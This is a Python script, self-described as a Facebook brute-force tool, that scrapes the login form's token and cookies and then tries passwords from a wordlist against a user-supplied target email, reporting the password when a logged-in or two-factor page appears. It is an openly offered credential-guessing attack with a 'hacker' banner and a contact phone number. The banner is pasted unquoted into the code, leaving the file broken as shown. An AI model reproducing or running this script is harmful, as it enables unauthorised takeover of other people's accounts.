import requests

import threading

# import urllib.request

# import os

from bs4 import BeautifulSoup

import sys

 

if sys.version_info[0] !=3: 

	print('''--------------------------------------	REQUIRED PYTHON 3.x

	use: python3 fb.py

--------------------------------------

			''')

	sys.exit()

 

post_url='https://www.facebook.com/login.php'

headers = {

	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',

}

payload={}

cookie={}

 

def create_form():

	form=dict()

	cookie={'fr':'0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}

 

	data=requests.get(post_url,headers=headers)

	for i in data.cookies:

		cookie[i.name]=i.value

	data=BeautifulSoup(data.text,'html.parser').form

	if data.input['name']=='lsd':

		form['lsd']=data.input['value']

	return (form,cookie)

 

def function(email,passw,i):

	global payload,cookie

	if i%10==1:

		payload,cookie=create_form()

		payload['email']=email

	payload['pass']=passw

	r=requests.post(post_url,data=payload,cookies=cookie,headers=headers)

	if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text:

		open('temp','w').write(str(r.content))

		print('\npassword is : ',passw)

		return True

	return False

 

print('\n---------- Welcome To Facebook BruteForce  SHEIKH UMAR - HACKER----------\n')

                      ar

               ,e*m_  tF  g@^Np    _

          !h_  0L_JF  0#  #p_gF  _#^

           `#g_      jF9L      _g@  ___

      g@!#   #NNw__adF  "#g__g#"N  aP""#

      #mw#   0L    #L    ,#     #  `#mw@

  mg___    _a#_    ]#    #F     BL_   ___gM*

    "9N#*^^"""Np_   9L  JF   _g@""""^"##""

  _ag_  N%     "*#__d"^^"#mg#""     j@" ,pmq_

 dF  B   TL____  _#        0L_______#   0_ j#

  9**"  a@""""^9##"         B@""""" 9M_  """

  ___gg@"       _2F        _Bp_       "#Mgg__

 ^""""""@*___g#@F""#___ __jF""9##g__*@""    "

   __a_   3#"     g@F"#MF"Nh_     3@   apmg

   0C jF  jF    _g@   j#   "#L     #   #__2F

    """  g#_ammg#"    ]#     0Ne*wgj#_ """"

       j#@"     5h   _j#__  j@     ""NM_

      *"  ,p**g  0Lg@"  "9M_0   #F9M   "^

          9L__#  JN" __a_  N#  `h__#

           """   #F  #" j#  9L

                J#   `**@"   @

                                   World Famous Hacker

                                   contact:03163563487 WhatsApp

file=open('passwords.txt','r')

 

email=input('Enter Email/Username : ')

 

print("\nTarget Email ID : ",email)

print("\nTrying Passwords from list ...")

 

i=0

while file:

	passw=file.readline().strip()

	i+=1

	if len(passw) < 6:

		continue

	print(str(i) +" : ",passw)

	if function(email,passw,i):

		break
